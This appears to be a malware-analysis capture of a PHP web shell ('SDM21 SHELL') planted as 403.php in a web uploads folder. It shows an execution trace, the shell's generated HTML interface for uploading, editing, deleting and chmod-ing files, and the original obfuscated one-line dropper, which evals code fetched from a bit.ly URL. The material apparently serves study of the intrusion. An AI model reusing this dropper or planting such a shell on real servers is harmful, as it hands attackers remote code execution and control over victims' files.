3 A /var/www/html/uploads/403.php(1) : eval()'d code 350 $info .= 'w'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 353 $info .= '-'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 356 $info .= 'r'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 357 $info .= '-'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 360 $info .= '-'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 363 $info .= 'r'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 364 $info .= '-'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 367 $info .= '-'
3 39 1 0.199531 483400
3 39 R '-rw-r--r--'
3 41 0 0.199544 483360 is_writable 0 /var/www/html/uploads/403.php(1) : eval()'d code 296 1 '/var/www/html/uploads/.htaccess'
3 41 1 0.199559 483400
3 41 R FALSE
3 42 0 0.199572 483360 is_readable 0 /var/www/html/uploads/403.php(1) : eval()'d code 296 1 '/var/www/html/uploads/.htaccess'
3 42 1 0.199587 483400
3 42 R TRUE
3 43 0 0.199600 483360 is_file 0 /var/www/html/uploads/403.php(1) : eval()'d code 280 1 '/var/www/html/uploads/403.php'
3 43 1 0.199615 483400
3 43 R TRUE
3 44 0 0.199627 483360 filesize 0 /var/www/html/uploads/403.php(1) : eval()'d code 281 1 '/var/www/html/uploads/403.php'
3 44 1 0.199641 483400
3 44 R 124
2 A /var/www/html/uploads/403.php(1) : eval()'d code 281 $size = 0.12109375
3 45 0 0.199664 483264 round 0 /var/www/html/uploads/403.php(1) : eval()'d code 282 2 0.12109375 3
3 45 1 0.199678 483336
3 45 R 0.121
2 A /var/www/html/uploads/403.php(1) : eval()'d code 282 $size = 0.121
2 A /var/www/html/uploads/403.php(1) : eval()'d code 286 $size = '0.121 KB'
3 46 0 0.199717 483360 is_writable 0 /var/www/html/uploads/403.php(1) : eval()'d code 293 1 '/var/www/html/uploads/403.php'
3 46 1 0.199733 483400
3 46 R FALSE
3 47 0 0.199746 483360 is_readable 0 /var/www/html/uploads/403.php(1) : eval()'d code 294 1 '/var/www/html/uploads/403.php'
3 47 1 0.199761 483400
3 47 R TRUE
3 48 0 0.199773 483360 perms 1 /var/www/html/uploads/403.php(1) : eval()'d code 295 1 '/var/www/html/uploads/403.php'
4 49 0 0.199786 483360 fileperms 0 /var/www/html/uploads/403.php(1) : eval()'d code 320 1 '/var/www/html/uploads/403.php'
4 49 1 0.199799 483400
4 49 R 33204
3 A /var/www/html/uploads/403.php(1) : eval()'d code 320 $perms = 33204
3 A /var/www/html/uploads/403.php(1) : eval()'d code 330 $info = '-'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 349 $info .= 'r'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 350 $info .= 'w'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 353 $info .= '-'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 356 $info .= 'r'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 357 $info .= 'w'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 360 $info .= '-'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 363 $info .= 'r'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 364 $info .= '-'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 367 $info .= '-'
3 48 1 0.199920 483400
3 48 R '-rw-rw-r--'
3 50 0 0.199933 483360 is_writable 0 /var/www/html/uploads/403.php(1) : eval()'d code 296 1 '/var/www/html/uploads/403.php'
3 50 1 0.199948 483400
3 50 R FALSE
3 51 0 0.199961 483360 is_readable 0 /var/www/html/uploads/403.php(1) : eval()'d code 296 1 '/var/www/html/uploads/403.php'
3 51 1 0.199976 483400
3 51 R TRUE
3 52 0 0.200078 483360 is_file 0 /var/www/html/uploads/403.php(1) : eval()'d code 280 1 '/var/www/html/uploads/data'
3 52 1 0.200095 483400
3 52 R FALSE
3 53 0 0.200108 483368 is_file 0 /var/www/html/uploads/403.php(1) : eval()'d code 280 1 '/var/www/html/uploads/prepend.php'
3 53 1 0.200123 483416
3 53 R TRUE
3 54 0 0.200136 483376 filesize 0 /var/www/html/uploads/403.php(1) : eval()'d code 281 1 '/var/www/html/uploads/prepend.php'
3 54 1 0.200149 483416
3 54 R 57
2 A /var/www/html/uploads/403.php(1) : eval()'d code 281 $size = 0.0556640625
3 55 0 0.200173 483272 round 0 /var/www/html/uploads/403.php(1) : eval()'d code 282 2 0.0556640625 3
3 55 1 0.200187 483344
3 55 R 0.056
2 A /var/www/html/uploads/403.php(1) : eval()'d code 282 $size = 0.056
2 A /var/www/html/uploads/403.php(1) : eval()'d code 286 $size = '0.056 KB'
3 56 0 0.200222 483376 is_writable 0 /var/www/html/uploads/403.php(1) : eval()'d code 293 1 '/var/www/html/uploads/prepend.php'
3 56 1 0.200238 483416
3 56 R FALSE
3 57 0 0.200251 483376 is_readable 0 /var/www/html/uploads/403.php(1) : eval()'d code 294 1 '/var/www/html/uploads/prepend.php'
3 57 1 0.200266 483416
3 57 R TRUE
3 58 0 0.200279 483376 perms 1 /var/www/html/uploads/403.php(1) : eval()'d code 295 1 '/var/www/html/uploads/prepend.php'
4 59 0 0.200292 483376 fileperms 0 /var/www/html/uploads/403.php(1) : eval()'d code 320 1 '/var/www/html/uploads/prepend.php'
4 59 1 0.200306 483416
4 59 R 33261
3 A /var/www/html/uploads/403.php(1) : eval()'d code 320 $perms = 33261
3 A /var/www/html/uploads/403.php(1) : eval()'d code 330 $info = '-'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 349 $info .= 'r'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 350 $info .= 'w'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 353 $info .= 'x'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 356 $info .= 'r'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 357 $info .= '-'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 360 $info .= 'x'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 363 $info .= 'r'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 364 $info .= '-'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 367 $info .= 'x'
3 58 1 0.200430 483416
3 58 R '-rwxr-xr-x'
3 60 0 0.200444 483376 is_writable 0 /var/www/html/uploads/403.php(1) : eval()'d code 296 1 '/var/www/html/uploads/prepend.php'
3 60 1 0.200460 483416
3 60 R FALSE
3 61 0 0.200473 483376 is_readable 0 /var/www/html/uploads/403.php(1) : eval()'d code 296 1 '/var/www/html/uploads/prepend.php'
3 61 1 0.200489 483416
3 61 R TRUE
2 5 1 0.200503 483312
1 3 1 0.200515 427136
0.200545 346312
TRACE END [2023-02-13 00:14:57.331266]
Generated HTML code
<html><head>
<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link rel="icon" type="image/jpg" href="https://i.ibb.co/M1JCKDN/images-jpeg.jpg">
<title></title>
</head><body><center>
<style type="text/css">
body {
font-family: Kelly Slab;
background-color: black;
color: white;
}
#content tr:hover{
background-color: #0200FF;
text-shadow:0px 0px 10px #339900;
}
#content .first{
color: #000000;
background-image:url(https://wallpaper.sc/id/applewatch/wp-content/uploads/2018/08/applewatch-312x390-photoface-wallpaper_01348-312x312.jpg);
}
#content .first:hover{
background-color: grey;
text-shadow:0px 0px 1px #339900;
}
table, th, td {
border-collapse:collapse;
padding: 5px;
color: white;
}
.table_home, .th_home, .td_home {
color:grey;
border: 2px solid grey;
padding: 7px;
}
a{
font-size: 19px;
color: #ffffff;
text-decoration: none;
}
a:hover{
color: white;
text-shadow:0px 0px 10px #339900;
}
input,select,textarea{
border: 1px #ffffff solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
.close {
overflow: auto;
border: 1px solid red;
background: red;
color: white;
}
.r {
float: right;
text-align: right;
}
</style>
<a href="?"><h1 style="font-family: Kelly Slab; font-size: 35px; color: white;">
SDM21 SHELL</h1></a>
<table width="95%" border="0" cellpadding="0" cellspacing="0" align="left">
<tbody><tr><td></td></tr><tr><td><font color="white">
<i class="fa fa-user"></i> </font></td><td>: <font color="lime">::1</font></td></tr><tr><td><font color="white">
<i class="fa fa-desktop"></i> </font></td><td>: <font color="lime">127.0.0.1 / localhost</font></td></tr><tr><td><font color="white">
<i class="fa fa-hdd-o"></i> </font></td><td>: <font color="lime">Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</font></td></tr></tbody></table><table width="95%" border="0" cellpadding="0" cellspacing="0" align="center">
<tbody><tr align="center"><td align="center"><br><i class="fa fa-folder-o"></i> : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/<br><br><br><font color="yellow"></font><form enctype="multipart/form-data" method="POST"><font color="yellow">
Upload File: <input type="file" name="file" style="color:cyan;border:2px solid red;" required=""></font>
<input type="submit" value="UPLOAD" style="margin-top:4px;width:100px;height:27px;font-family:Kelly Slab;font-size:15;background:black;color: yellow;border:2px solid red;border-radius:5px"></form></td></tr></tbody></table><br><center></center><div id="content"><table width="95%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<th><center>Name</center></th>
<th><center>Size</center></th>
<th><center>Perm</center></th>
<th><center>Options</center></th>
</tr>
<tr></tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr>
<td class="td_home"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII="><a href="?filesrc=/var/www/html/403.php&path=/var/www/html"> 403.php</a></td>
<td class="td_home"><center>0.121 KB</center></td>
<td class="td_home"><center>-rw-rw-r--</center></td>
<td class="td_home"><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt" style="margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
<option value="Action">Action</option>
<option value="delete">SDM Hapus</option>
<option value="edit">SDM Edit</option>
<option value="rename">SDM Ganti Nama</option>
<option value="chmod">SDM Chmod</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="403.php">
<input type="hidden" name="path" value="/var/www/html/403.php">
<input type="submit" value=">" style="margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
</form></center></td>
</tr><tr>
<td class="td_home"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII="><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html"> beneri.se_malware_analysis</a></td>
<td class="td_home"><center>0 KB</center></td>
<td class="td_home"><center>-rw-r--r--</center></td>
<td class="td_home"><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt" style="margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
<option value="Action">Action</option>
<option value="delete">SDM Hapus</option>
<option value="edit">SDM Edit</option>
<option value="rename">SDM Ganti Nama</option>
<option value="chmod">SDM Chmod</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value=">" style="margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
</form></center></td>
</tr></tbody></table>
</div><center>
<br>
<font size="2px" color="white">Copyright © <script type="text/javascript">var creditsyear = new Date();document.write(creditsyear.getFullYear()); </script>2023 SDM21. All Right Reserved.</font>
</center>
</center></body></html>Original PHP code
<?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://bit.ly/3iLHOKD"));/**/?>